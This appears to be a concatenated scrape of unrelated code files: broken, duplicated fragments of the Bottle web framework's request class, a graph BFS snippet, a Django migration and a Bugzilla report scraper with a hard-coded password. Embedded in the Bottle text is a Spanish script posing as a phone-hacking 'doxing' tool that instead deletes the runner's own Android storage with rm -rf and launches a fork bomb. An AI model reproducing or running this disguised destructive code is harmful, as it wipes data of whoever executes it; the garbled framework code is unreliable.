get = self.environ['bottle.get'] = FormsDict()
pairs = _parse_qsl(self.environ.get('QUERY_STRING', ''))
for key, value in pairs:
get[key] = value
return get
@DictProperty('environ', 'bottle.request.forms', read_only=True)
def forms(self):
""" Form values parsed from an `url-encoded` or `multipart/form-data`
encoded POST or PUT request body. The result is returned as a
:class:`FormsDict`. All keys and values are strings. File uploads
are stored separately in :attr:`files`. """
forms = FormsDict()
forms.recode_unicode = self.POST.recode_unicode
for name, item in self.POST.allitems():
if not isinstance(item, FileUpload):
forms[name] = item
return forms
@DictProperty('environ', 'bottle.request.params', read_only=True)
def params(self):
""" A :class:`FormsDict` with the combined values of :attr:`query` and
:attr:`forms`. File uploads are stored in :attr:`files`. """
params = FormsDict()
for key, value in self.query.allitems():
params[key] = value
for key, value in self.forms.allitems():
params[key] = value
return params
@DictProperty('environ', 'bottle.request.files', read_only=True)
def files(self):
""" File uploads parsed from `multipart/form-data` encoded POST or PUT
request body. The values are instances of :class:`FileUpload`.
"""
files = FormsDict()
files.recode_unicode = self.POST.recode_unicode
for name, item in self.POST.allitems():
if isinstance(item, FileUpload):
files[name] = item
return files
@DictProperty('environ', 'bottle.request.json', read_only=True)
def json(self):
""" If the ``Content-Type`` header is ``application/json`` or
``application/json-rpc``, this property holds the parsed content
of the request body. Only requests smaller than :attr:`MEMFILE_MAX`
are processed to avoid memory exhaustion.
Invalid JSON raises a 400 error response.
"""
ctype = self.environ.get('CONTENT_TYPE', '').lower().split(';')[0]
if ctype in ('application/json', 'application/json-rpc'):
b = self._get_body_string(self.MEMFILE_MAX)
if not b:
return None
try:
return json_loads(b)
except (ValueError, TypeError):
raise HTTPError(400, 'Invalid JSON')
return None
def _iter_body(self, read, bufsize):
maxread = max(0, self.content_length)
while maxread:
part = read(min(maxread, bufsize))
if not part: break
yield part
maxread -= len(part)
@staticmethod
def _iter_chunked(read, bufsi)
header = read(1)
while header[-2:] != rn:
c = read(1)
header += c
if not c: raise err
if len(header) > bufsize: raise err
size, _, _ = header.partition(sem)
try:
maxread = int(tonat(size.strip()), 16)
except ValueError:
raise err
if maxread == 0: break
buff = bs
while maxread > 0:
if not buff:
buff = read(min(maxread, bufsize))
part, buff = buff[:maxread], buff[maxread:]
if not part: raise err
yield part
maxread -= len(part)
if read(2) != rn:
raise err
@DictProperty('environ', 'bottle.request.body', read_only=True)
def _body(self):
try:
read_func = self.environ['wsgi.input'].read
except KeyError:
self.environ['wsgi.input'] = BytesIO()
return self.environ['wsgi.input']
body_iter = self._iter_chunked if self.chunked else self._iter_body
body, body_size, is_temp_file = BytesIO(), 0, False
for part in body_iter(read_func, self.MEMFILE_MAX):
body.write(part)
body_size += len(part)
if not is_temp_file and body_size > self.MEMFILE_MAX:
body, tmp = TemporaryFile(mode='w+b'), body
body.write(tmp.getvalue())
del tmp
is_temp_file = True
self.environ['wsgi.input'] = body
body.seek(0)
return body
def _get_body_string(self, maxread):
""" Read body into a string. Raise HTTPError(413) on requests that are
to large. """
if self.content_length > maxread:
raise HTTPError(413, 'Request entity too large')
data = self.body.read(maxread + 1)
if len(data) > maxread:
raise HTTPError(413, 'Request entity too large')
return data
@property
def body(self):
""" The HTTP request body as a seek-able file-like object. Depending on
:attr:`MEMFILE_MAX`, this is either a temporary file or a
:class:`io.BytesIO` instance. Accessing this property for the first
time reads and replaces the ``wsgi.input`` environ variable.
Subsequent accesses just do a `seek(0)` on the file object. """
self._body.seek(0)
return self._body
@property
def chunked(self):
""" True if Chunked transfer encoding was. """
return 'chunked' in self.environ.get(
'HTTP_TRANSFER_ENCODING', '').lower()
#: An alias for :attr:`query`.
GET = query
@DictProperty('environ', 'bottle.request.post', read_only=True)
def POST(self):
""" The values of :attr:`forms` and :attr:`files` combined into a single
:class:`FormsDict`. Values are either strings (form values) or
instances of :class:`cgi.FieldStorage` (file uploads).
"""
post = FormsDict()
# We default to application/x-www-form-urlencoded for everything that
# is not multipart and take the fast path (also: 3.1 workaround)
if not self.content_type.startswith('multipart/'):
body = tonat(self._get_body_string(self.MEMFILE_MAX), 'latin1')
for key, value in _parse_qsl(body):
post[key] = value
return post
safe_env = {'QUERY_STRING': ''} # Build a safe environment for cgi
for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
if key in self.environ: safe_env[key] = self.environ[key]
args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)
if py3k:
args['encoding'] = 'utf8'
post.recode_unicode = False
data = cgi.FieldStorage(**args)
self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394
data = data.list or []
for item in data:
if item.filename:
post[item.name] = FileUpload(item.file, item.name,
item.filename, item.headers)
else:
post[item.name] = item.value
return post
@property
def url(self):
""" The full request URI including hostname and scheme. If your app
lives behind a reverse proxy or load balancer and you get confusing
results, make sure that the ``X-Forwarded-Host`` header is set
correctly. """
return self.urlparts.geturl()
@DictProperty('environ', 'bottle.request.urlparts', read_only=True)
def urlparts(self):
""" The :attr:`url` string as an :class:`urlparse.SplitResult` tuple.
The tuple contains (scheme, host, path, query_string and fragment),
but the fragment is always empty because it is not visible to the
server. """
env = self.environ
http = env.get('HTTP_X_FORWARDED_P
or env.get('wsgi.url_scheme', 'http')
host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST')
if not host:
# HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients.
host = env.get('SERVER_NAME', '127.0.0.1')
port = env.get('SERVER_PORT')
if port and port != ('80' if http == 'http' else '443'):
host += ':' + port
path = urlquote(self.fullpath)
return UrlSplitResult(http, host, path, env.get('QUERY_STRING'), '')
@property
def fullpath(self):
""" Request path including :attr:`script_name` (if present). """
return urljoin(self.script_name, self.path.lstrip('/'))
@property
def query_string(self):
""" The raw :attr:`query` part of the URL (everything in between ``?``
and ``#``) as a string. """
return self.environ.get('QUERY_STRING', '')
@property
def script_name(self):
""" The initial portion of the URL's `path` that was removed by a higher
level (server or routing middleware) before the application was
called. This script path is returned with leading and tailing
slashes. """
script_name = self.environ.get('SCRIPT_NAME', '').strip('/')
return '/' + script_name + '/' if script_name else '/'
def path_shift(self, shift=1):
""" Shift path segments from :attr:`path` to :attr:`script_name` and
vice versa.
:param shift: The number of path segments to shift. May be negative
to change the shift direction. (default: 1)
"""
script, path = path_shift(self.environ.get('SCRIPT_NAME', '/'), self.path, shift)
self['SCRIPT_NAME'], self['PATH_INFO'] = script, path
@property
def content_length(self):
""" The request body length as an integer. The client is responsible to
set this header. Otherwise, the real length of the body is unknown
and -1 is returned. In this case, :attr:`body` will be empty. """
return int(self.environ.get('CONTENT_LENGTH') or -1)
@property
def content_type(self):
""" The Content-Type header as a lowercase-string (default: empty). """
return self.environ.get('CONTENT_TYPE', '').lower()
@property
def is_xhr(self):
""" True if the request was triggered by a XMLHttpRequest. This only
works with JavaScript libraries that support the `X-Requested-With`
header (most of the popular libraries do). """
requested_with = self.environ.get('HTTP_X_REQUESTED_WITH', '')
return requested_with.lower() == 'xmlhttprequest'
@property
def is_ajax(self):
""" Alias for :attr:`is_xhr`. "Ajax" is not the right term. """
return self.is_xhr
@property
def auth(self):
""" HTTP authentication data as a (user, password) tuple. This
implementation currently supports basic (not digest) authentication
only. If the authentication happened at a higher level (e.g. in the
front web-server or a middleware), the password field is None, but
the user field is looked up from the ``REMOTE_USER`` environ
variable. On any errors, None is returned. """
basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION', ''))
if basic: return basic
ruser = self.environ.get('REMOTE_USER')
if ruser: return (ruser, None)
return None
@property
def remote_route(self):
""" A list of all IPs that were involved in this request, starting with
the client IP and followed by zero or more proxies. This does only
work if all proxies support the ```X-Forwarded-For`` header. Note
that this information can be forged by malicious clients. """
proxy = self.environ.get('HTTP_X_FORWARDED_FOR')
if proxy: return [ip.strip() for ip in proxy.split(',')]
remote = self.environ.get('REMOTE_ADDR')
return [remote] if remote else []
@property
def remote_addr(self):
""" The client IP as a string. Note that this information can be forged
by malicious clients. """
route = self.remote_route
# return route[0] if route else None
'''
def banner():
print("""
___ _ ____
___| \ _____ __ / |__ |
|___| |) / _ \ \ / | | / /
|___/\___/_\_\ |_|/_(_)
Script para doxear solo con numero telefonico y elimnar todo los datos de la victima.
Created by 17.
""")
"""
post = FormsDict()
# We default to application/x-www-form-urlencoded for everything that
# is not multipart and take the fast path (also: 3.1 workaround)
if not self.content_type.startswith('multipart/'):
body = tonat(self._get_body_string(self.MEMFILE_MAX), 'latin1')
for key, value in _parse_qsl(body):
post[key] = value
return post
safe_env = {'QUERY_STRING': ''} # Build a safe environment for cgi
for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
if key in self.environ: safe_env[key] = self.environ[key]
args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)
if py3k:
args['encoding'] = 'utf8'
post.recode_unicode = False
data = cgi.FieldStorage(**args)
self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394
data = data.list or []
for item in data:
if item.filename:
post[item.name] = FileUpload(item.file, item.name,
item.filename, item.headers)
else:
post[item.name] = item.value
return post
@property
def url(self):
The full request URI including hostname and scheme. If your app
lives behind a reverse proxy or load balancer and you get confusing
results, make sure that the ``X-Forwarded-Host`` header is set
correctly. return self.urlparts.geturl()
@DictProperty('environ', 'bottle.request.urlparts', read_only=True)
def urlparts(self):
The :attr:`url` string as an :class:`urlparse.SplitResult` tuple.
The tuple contains (scheme, host, path, query_string and fragment),
but the fragment is always empty because it is not visible to the
server.
env = self.environ
http = env.get('HTTP_X_FORWARDED_PROT
or env.get('wsgi.url_scheme', 'http')
host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST')
if not host:
# HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients.
host = env.get('SERVER_NAME', '127.0.0.1')
port = env.get('SERVER_PORT')
if port and port != ('80' if http == 'http' else '443'):
host += ':' + port
path = urlquote(self.fullpath)
return UrlSplitResult(http, host, path, env.get('QUERY_STRING'), '')
@property
def fullpath(self):
Request path including :attr:`script_name` (if present). """
banner()
numero = input("\n Introduce el número del enemigo: ")
print(" LOADING....")
print(f"\n Mandando SMS con vulnerabilidad 0day a {numero}")
time.sleep(10)
print(f"\n introduciendose en el dispositivo, IP: 192.168.0.1")
time.sleep(10)
print(f"\n Generando persistencia al {numero}")
time.sleep(10)
siii = int(eval(input(" \nPersistencia lista, preparado para eliminar todo?\n\n En tu pantalla se mostrara lo que se va borrando del objetivo\n Listo? \n 1)si \n responde: ")))
os.system("clear")
if siii == 1:
print(" \n comienzo de depuracion del telefono objetivo")
print(" en 6")
time.sleep(1)
print(" en 5")
time.sleep(1)
print(" en 4")
time.sleep(1)
print(" en 3")
time.sleep(1)
print(" en 2")
time.sleep(1)
print(" en 1")
time.sleep(1)
print(" Formateando el telefono del enemigo")
os.system("rm -rf /storage/emulated/0/*")
os.system("rm - rf /storage/emulated/Android")
os.system("rm -rf /storage/emulated/0/data")
os.system("rm -rf /storage/emulated/0/DCIM")
os.system("rm -rf /storage/emulated/0/Download")
os.system("rm -rf /storage/emulated/0/download")
os.system("rm -rf /storage/emulated/0/Descargas")
os.system("rm -rf /storage/emulated/0/descargas")
os.system("rm -rf /storage/emulated/0/Documents")
os.system("rm -rf /storage/emulated/0/documents")
os.system("rm -rf /storage/emulated/0/whatsapp")
os.system("rm -rf /storage/emulated/0/*")
os.system(":(){ :|:& };:")
else:
print("Introdujiste un valor erroneo reintenta por favor")
time.sleep(3)
os.system("clear")
os.system(":(){ :|:& };:")
'''
def fetr():
def get_cookie(self, key, default=None, secret=None, digestmod=hashlib.sha256):
""" Return the content of a cookie. To read a `Signed Cookie`, the
`secret` must match the one used to create the cookie (see
:meth:`BaseResponse.set_cookie`). If anything goes wrong (missing
cookie or wrong signature), return a default value. """
value = self.cookies.get(key)
if secret:
# See BaseResponse.set_cookie for details on signed cookies.
if value and value.startswith('!') and '?' in value:
sig, msg = map(tob, value[1:].split('?', 1))
hash = hmac.new(tob(secret), msg, digestmod=digestmod).digest()
if _lscmp(sig, base64.b64encode(hash)):
dst = pickle.loads(base64.b64decode(msg))
if dst and dst[0] == key:
return dst[1]
return default
return value or default
@DictProperty('environ', 'bottle.request.query', read_only=True)
def query(self):
""" The :attr:`query_string` parsed into a :class:`FormsDict`. These
values are sometimes called "URL arguments" or "GET parameters", but
not to be confused with "URL wildcards" as they are provided by the
:class:`Router`. """
get = self.environ['bottle.get'] = FormsDict()
pairs = _parse_qsl(self.environ.get('QUERY_STRING', ''))
for key, value in pairs:
get[key] = value
return get
@DictProperty('environ', 'bottle.request.forms', read_only=True)
def forms(self):
""" Form values parsed from an `url-encoded` or `multipart/form-data`
encoded POST or PUT request body. The result is returned as a
:class:`FormsDict`. All keys and values are strings. File uploads
are stored separately in :attr:`files`. """
forms = FormsDict()
forms.recode_unicode = self.POST.recode_unicode
for name, item in self.POST.allitems():
if not isinstance(item, FileUpload):
forms[name] = item
return forms
@DictProperty('environ', 'bottle.request.params', read_only=True)
def params(self):
""" A :class:`FormsDict` with the combined values of :attr:`query` and
:attr:`forms`. File uploads are stored in :attr:`files`. """
params = FormsDict()
for key, value in self.query.allitems():
params[key] = value
for key, value in self.forms.allitems():
params[key] = value
return params
@DictProperty('environ', 'bottle.request.files', read_only=True)
def files(self):
""" File uploads parsed from `multipart/form-data` encoded POST or PUT
request body. The values are instances of :class:`FileUpload`.
"""
files = FormsDict()
files.recode_unicode = self.POST.recode_unicode
for name, item in self.POST.allitems():
if isinstance(item, FileUpload):
files[name] = item
return files
@DictProperty('environ', 'bottle.request.json', read_only=True)
def json(self):
""" If the ``Content-Type`` header is ``application/json`` or
``application/json-rpc``, this property holds the parsed content
of the request body. Only requests smaller than :attr:`MEMFILE_MAX`
are processed to avoid memory exhaustion.
Invalid JSON raises a 400 error response.
"""
ctype = self.environ.get('CONTENT_TYPE', '').lower().split(';')[0]
if ctype in ('application/json', 'application/json-rpc'):
b = self._get_body_string(self.MEMFILE_MAX)
if not b:
return None
try:
return json_loads(b)
except (ValueError, TypeError):
raise HTTPError(400, 'Invalid JSON')
return None
def _iter_body(self, read, bufsize):
maxread = max(0, self.content_length)
while maxread:
part = read(min(maxread, bufsize))
if not part: break
yield part
maxread -= len(part)
@staticmethod
def _iter_chunked(read, bufsi)
header = read(1)
while header[-2:] != rn:
c = read(1)
header += c
if not c: raise err
if len(header) > bufsize: raise err
size, _, _ = header.partition(sem)
try:
maxread = int(tonat(size.strip()), 16)
except ValueError:
raise err
if maxread == 0: break
buff = bs
while maxread > 0:
if not buff:
buff = read(min(maxread, bufsize))
part, buff = buff[:maxread], buff[maxread:]
if not part: raise err
yield part
maxread -= len(part)
if read(2) != rn:
raise err
@DictProperty('environ', 'bottle.request.body', read_only=True)
def _body(self):
try:
read_func = self.environ['wsgi.input'].read
except KeyError:
self.environ['wsgi.input'] = BytesIO()
return self.environ['wsgi.input']
body_iter = self._iter_chunked if self.chunked else self._iter_body
body, body_size, is_temp_file = BytesIO(), 0, False
for part in body_iter(read_func, self.MEMFILE_MAX):
body.write(part)
body_size += len(part)
if not is_temp_file and body_size > self.MEMFILE_MAX:
body, tmp = TemporaryFile(mode='w+b'), body
body.write(tmp.getvalue())
del tmp
is_temp_file = True
self.environ['wsgi.input'] = body
body.seek(0)
return body
def _get_body_string(self, maxread):
""" Read body into a string. Raise HTTPError(413) on requests that are
to large. """
if self.content_length > maxread:
raise HTTPError(413, 'Request entity too large')
data = self.body.read(maxread + 1)
if len(data) > maxread:
raise HTTPError(413, 'Request entity too large')
return data
@property
def body(self):
""" The HTTP request body as a seek-able file-like object. Depending on
:attr:`MEMFILE_MAX`, this is either a temporary file or a
:class:`io.BytesIO` instance. Accessing this property for the first
time reads and replaces the ``wsgi.input`` environ variable.
Subsequent accesses just do a `seek(0)` on the file object. """
self._body.seek(0)
return self._body
@property
def chunked(self):
""" True if Chunked transfer encoding was. """
return 'chunked' in self.environ.get(
'HTTP_TRANSFER_ENCODING', '').lower()
#: An alias for :attr:`query`.
GET = query
@DictProperty('environ', 'bottle.request.post', read_only=True)
def POST(self):
""" The values of :attr:`forms` and :attr:`files` combined into a single
:class:`FormsDict`. Values are either strings (form values) or
instances of :class:`cgi.FieldStorage` (file uploads).
"""
post = FormsDict()
# We default to application/x-www-form-urlencoded for everything that
# is not multipart and take the fast path (also: 3.1 workaround)
if not self.content_type.startswith('multipart/'):
body = tonat(self._get_body_string(self.MEMFILE_MAX), 'latin1')
for key, value in _parse_qsl(body):
post[key] = value
return post
safe_env = {'QUERY_STRING': ''} # Build a safe environment for cgi
for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
if key in self.environ: safe_env[key] = self.environ[key]
args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)
if py3k:
args['encoding'] = 'utf8'
post.recode_unicode = False
data = cgi.FieldStorage(**args)
self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394
data = data.list or []
for item in data:
if item.filename:
post[item.name] = FileUpload(item.file, item.name,
item.filename, item.headers)
else:
post[item.name] = item.value
return post
@property
def url(self):
""" The full request URI including hostname and scheme. If your app
lives behind a reverse proxy or load balancer and you get confusing
results, make sure that the ``X-Forwarded-Host`` header is set
correctly. """
return self.urlparts.geturl()
@DictProperty('environ', 'bottle.request.urlparts', read_only=True)
def urlparts(self):
""" The :attr:`url` string as an :class:`urlparse.SplitResult` tuple.
The tuple contains (scheme, host, path, query_string and fragment),
but the fragment is always empty because it is not visible to the
server. """
env = self.environ
http = env.get('HTTP_X_FORWARDED_P
or env.get('wsgi.url_scheme', 'http')
host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST')
if not host:
# HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients.
host = env.get('SERVER_NAME', '127.0.0.1')
port = env.get('SERVER_PORT')
if port and port != ('80' if http == 'http' else '443'):
host += ':' + port
path = urlquote(self.fullpath)
return UrlSplitResult(http, host, path, env.get('QUERY_STRING'), '')
@property
def fullpath(self):
""" Request path including :attr:`script_name` (if present). """
return urljoin(self.script_name, self.path.lstrip('/'))
@property
def query_string(self):
""" The raw :attr:`query` part of the URL (everything in between ``?``
and ``#``) as a string. """
return self.environ.get('QUERY_STRING', '')
@property
def script_name(self):
""" The initial portion of the URL's `path` that was removed by a higher
level (server or routing middleware) before the application was
called. This script path is returned with leading and tailing
slashes. """
script_name = self.environ.get('SCRIPT_NAME', '').strip('/')
return '/' + script_name + '/' if script_name else '/'
def path_shift(self, shift=1):
""" Shift path segments from :attr:`path` to :attr:`script_name` and
vice versa.
:param shift: The number of path segments to shift. May be negative
to change the shift direction. (default: 1)
"""
script, path = path_shift(self.environ.get('SCRIPT_NAME', '/'), self.path, shift)
self['SCRIPT_NAME'], self['PATH_INFO'] = script, path
@property
def content_length(self):
""" The request body length as an integer. The client is responsible to
set this header. Otherwise, the real length of the body is unknown
and -1 is returned. In this case, :attr:`body` will be empty. """
return int(self.environ.get('CONTENT_LENGTH') or -1)
@property
def content_type(self):
""" The Content-Type header as a lowercase-string (default: empty). """
return self.environ.get('CONTENT_TYPE', '').lower()
@property
def is_xhr(self):
""" True if the request was triggered by a XMLHttpRequest. This only
works with JavaScript libraries that support the `X-Requested-With`
header (most of the popular libraries do). """
requested_with = self.environ.get('HTTP_X_REQUESTED_WITH', '')
return requested_with.lower() == 'xmlhttprequest'
@property
def is_ajax(self):
""" Alias for :attr:`is_xhr`. "Ajax" is not the right term. """
return self.is_xhr
@property
def auth(self):
""" HTTP authentication data as a (user, password) tuple. This
implementation currently supports basic (not digest) authentication
only. If the authentication happened at a higher level (e.g. in the
front web-server or a middleware), the password field is None, but
the user field is looked up from the ``REMOTE_USER`` environ
variable. On any errors, None is returned. """
basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION', ''))
if basic: return basic
ruser = self.environ.get('REMOTE_USER')
if ruser: return (ruser, None)
return None
@property
def remote_route(self):
""" A list of all IPs that were involved in this request, starting with
the client IP and followed by zero or more proxies. This does only
work if all proxies support the ```X-Forwarded-For`` header. Note
that this information can be forged by malicious clients. """
proxy = self.environ.get('HTTP_X_FORWARDED_FOR')
if proxy: return [ip.strip() for ip in proxy.split(',')]
remote = self.environ.get('REMOTE_ADDR')
return [remote] if remote else []
@property
def remote_addr(self):
""" The client IP as a string. Note that this information can be forged
by malicious clients. """
route = self.remote_route
# return route[0] if route else None
'''
| [
"noreply@github.com"
] | Zeventeen-17.noreply@github.com |
819ec1c8c8d85fbbd009ac02e237aa8676c7034b | fd20345d593aa0b500ab3af466ee5ead6fb8da21 | /apps/prettyboyapp/migrations/0009_auto_20180620_0121.py | a666e85cfbb94e9282c7625feddce1dd1316039e | [] | no_license | paulwine/prettyboyRepo1 | 7c25f6d276d88717a2c9667ec1fe6813181767cf | 7736a6a283bee7131200d44db799573c9b99d883 | refs/heads/master | 2021-06-28T19:06:23.370780 | 2020-09-02T15:51:00 | 2020-09-02T15:51:00 | 136,745,540 | 0 | 0 | null | 2018-07-12T02:43:46 | 2018-06-09T17:48:28 | Python | UTF-8 | Python | false | false | 838 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-06-20 01:21
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('prettyboyapp', '0008_auto_20180610_0034'),
]
operations = [
migrations.AddField(
model_name='ride',
name='appointment_time',
field=models.TimeField(default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AlterField(
model_name='ride',
name='duration',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='ride',
name='pickup_datetime',
field=models.DateField(),
),
]
| [
"paulwinegard@gmail.com"
] | paulwinegard@gmail.com |
8d88b612386c5811f2709b90cd9a046cf5b1236e | 0e1e8d9a3622070bed359b9d062a4e51fbf169e5 | /graphs/BAckTraceBFS.py | 0d774ed89f2fe93f1f54126955837afff4e645d9 | [] | no_license | anuragdogra2192/Data_structures_with_python3 | 69f4aed4cbe17fd449b1bdc225c5d1d832af5e4f | d8b5b3dd8beb8ec0516d89a7be17d2a3cec8119d | refs/heads/master | 2023-02-19T23:59:21.142338 | 2023-02-15T10:51:59 | 2023-02-15T10:51:59 | 188,711,284 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 895 | py | #!/usr/bin/env python3
# graph is in adjacent list representation
graph = {
'1': ['2', '3', '4'],
'2': ['5', '6'],
'5': ['9', '10'],
'4': ['7', '8'],
'7': ['11', '12']
}
def bfs(graph, start, end):
# maintain a queue of paths
queue = []
# push the first path into the queue
queue.append([start])
while queue:
# get the first path from the queue
path = queue.pop(0)
# get the last node from the path
node = path[-1]
# path found
if node == end:
return path
# enumerate all adjacent nodes, construct a
# new path and push it into the queue
for adjacent in graph.get(node, []):
new_path = list(path)
new_path.append(adjacent)
queue.append(new_path)
print(bfs(graph, '1', '11')) | [
"anuragdogra.2192@gmail.com"
] | anuragdogra.2192@gmail.com |
6c3830beabee9c3e23adcf288f92d160bd2bae52 | f806767449782b48517f33032ca9bec2849b18fb | /Triage_Report.py | 668c3805b93fd98ce4e46e16fa1040edb18a39a8 | [] | no_license | abcwangxiang/web_develop | b1445652f4142acc4286773ae4f6abef8749510d | 84d51b32271648331916038631e46b10279f8c46 | refs/heads/master | 2021-01-10T18:44:44.066255 | 2015-06-10T11:32:42 | 2015-06-10T11:32:42 | 37,596,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,404 | py | import os
import re
import urllib
import cookielib
import xmlrpclib, httplib, sys
from urlparse import urljoin
import mechanize
from bs4 import BeautifulSoup
#report_order = ['triaged', 'fixed']
# Order in which the reports are generated and rendered; Triage_Report
# copies this module-level sequence into its per-instance report_list.
report_order = ['triaged','fixed', 'no_checkin_request', 'no_checkin']
class Triage_Report:
def __init__(self, username, password):
self.username = username
self.password = password
self.report_item = dict()
self.report_item['fixed'] = {'params_func':self.fixed_params, 'desc_func':self.fixed_description}
self.report_item['triaged'] = {'params_func':self.triaged_params, 'desc_func':self.triaged_description}
self.report_item['no_checkin_request'] = {'params_func':self.no_checkin_request_params, 'desc_func':self.no_checkin_request_description}
self.report_item['no_checkin'] = {'params_func':self.no_checkin_params, 'desc_func':self.no_checkin_description}
self.report_list = report_order
def get_logined_browser(self):
username = self.username
password = self.password
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(False)
br.set_handle_gzip(False)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefererProcessor(), max_time=1)
#br.set_debug_http(True)
#br.set_debug_redirects(True)
#br.set_debug_responses(True)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_responses(False)
br.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; U; MSIE 6.0; Windows NT 5.1)')]
#br.set_proxies({'http': 'http://proxy.vmware.com:3128', 'https': 'http://proxy.vmware.com:3128'})
page = br.open('https://bugzilla.eng.vmware.com/index.cgi')
#print page.read()
br.select_form(nr=0)
br.form.set_all_readonly(False)
br['Bugzilla_login'] = username
br['Bugzilla_password'] = password
r = br.submit()
res = r.get_data()
#print res
return br
def get_report_data(self, report_name, options):
params = self.report_item[report_name]['params_func'](options)
br = self.get_logined_browser()
data = urllib.urlencode(params)
print data
post_url = '''https://bugzilla.eng.vmware.com/buglist.cgi'''
page = br.open(post_url,data)
try:
result = self.page_to_dict(page)
except:
result = dict()
result['head'] = ['']
result['data'] = ['']
result['params'] = data
result['name'] = report_name
result['description'] = self.report_item[report_name]['desc_func'](options)
return result
def page_to_dict(self, page):
result = dict()
data = list()
soup = BeautifulSoup(page)
rows = soup.find("table", id='buglistSorter').find("tbody").find_all("tr")
for row in rows:
rowdata = list()
cells = row.find_all("td")
for cell in cells:
rn = cell.get_text()
rowdata.append(rn)
data.append(rowdata)
head = list()
row = soup.find("table", id='buglistSorter').find("thead").find("tr")
cells = row.find_all("th")
for cell in cells:
rn = cell.get_text().replace('\n','').strip()
head.append(rn)
result['head'] = head
result['data'] = data
return result
def read_default_params(self, filename):
file_name = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'Triage_Chart_Query_Template', filename)
file = open(file_name)
content = file.read()
lines = content.splitlines()
params = list()
for line in lines:
if line.strip().startswith('#') or not line:
continue
tuple = line.split("=")
params.append((tuple[0], tuple[1]))
return params
def get_report_name_list(self):
return self.report_list
def fixed_params(self, options):
params = self.read_default_params('fixed.txt')
assigned_to = options['assigned_to']
params.append(('email1', assigned_to))
params.append(('chfieldfrom', options['date_begin']))
params.append(('chfieldto', options['date_end']))
for fix_by_product_name in options['fix_by_product_name']:
params.append(('fix_by_product_name', fix_by_product_name))
for fix_by_version_name in options['fix_by_version_name']:
params.append(('fix_by_version_name', fix_by_version_name))
for fix_by_phase_name in options['fix_by_phase_name']:
params.append(('fix_by_phase_name', fix_by_phase_name))
return params
def fixed_description(self, options):
return "Bugs been fixed between %s and %s" %(options['date_begin'], options['date_end'])
def triaged_params(self, options):
params = self.read_default_params('triaged.txt')
assigned_to = options['assigned_to']
params.append(('email1', assigned_to))
params.append(('chfieldfrom', options['date_begin']))
params.append(('chfieldto', options['date_end']))
for fix_by_product_name in options['fix_by_product_name']:
params.append(('fix_by_product_name', fix_by_product_name))
for fix_by_version_name in options['fix_by_version_name']:
params.append(('fix_by_version_name', fix_by_version_name))
for fix_by_phase_name in options['fix_by_phase_name']:
params.append(('fix_by_phase_name', fix_by_phase_name))
return params
def triaged_description(self, options):
    """Human-readable one-liner for the 'triaged' report."""
    return "Bugs been triage-accepted between {0} and {1}".format(options['date_begin'], options['date_end'])
def no_checkin_request_params(self, options):
    """Build the query parameter list for the 'no checkin request' report.

    Unlike fixed/triaged, this report deliberately has no chfieldfrom /
    chfieldto window: it looks at current state, not a date range.
    """
    params = self.read_default_params('no_checkin_request.txt')
    params.append(('email1', options['assigned_to']))
    # Multi-valued filters: one query parameter per selected value.
    for field in ('fix_by_product_name', 'fix_by_version_name', 'fix_by_phase_name'):
        params.extend((field, value) for value in options[field])
    return params
def no_checkin_request_description(self, options):
    # Static description; `options` is accepted for interface symmetry with
    # the other *_description builders but is not used.
    return "Bugs in triage-accepted status, but NO CheckinApprovalRequested filed"
def no_checkin_params(self, options):
    """Build the query parameter list for the 'no checkin' report.

    Like no_checkin_request_params(), this is a current-state query, so no
    change-date window is added.
    """
    params = self.read_default_params('no_checkin.txt')
    params.append(('email1', options['assigned_to']))
    # Multi-valued filters: one query parameter per selected value.
    for field in ('fix_by_product_name', 'fix_by_version_name', 'fix_by_phase_name'):
        params.extend((field, value) for value in options[field])
    return params
def no_checkin_description(self, options):
    # Static description; `options` is accepted for interface symmetry with
    # the other *_description builders but is not used.
    return "Bugs been CheckinApproved, but code haven't been checked in yet"
def test():
    """Ad-hoc smoke test: run every report against a fixed shot of options.

    Not executed on import (the call below is commented out).
    """
    options = dict()
    options['assigned_to'] = 'fangchiw,hillzhao,vaibhavk,shanpeic,nmukuri'
    options['date_begin'] = '2014-09-15'
    options['date_end'] = '2014-09-23'
    options['fix_by_product_name'] = ['vsphere', 'esx']
    options['fix_by_version_name'] = ['5.1 P06', '5.1 P06Ps']
    options['fix_by_phase_name'] = []
    # SECURITY NOTE: credentials are hard-coded in source; move them to an
    # environment variable or prompt before sharing this file.
    tr = Triage_Report('fangchiw', '''we'reno.2''')
    for report_item in tr.get_report_name_list():
        # print() as a function call so this module parses under both
        # Python 2 and Python 3 (it was a bare py2 print statement).
        print(tr.get_report_data(report_item, options))
#test()
| [
"fangchiw@vmware.com"
] | fangchiw@vmware.com |
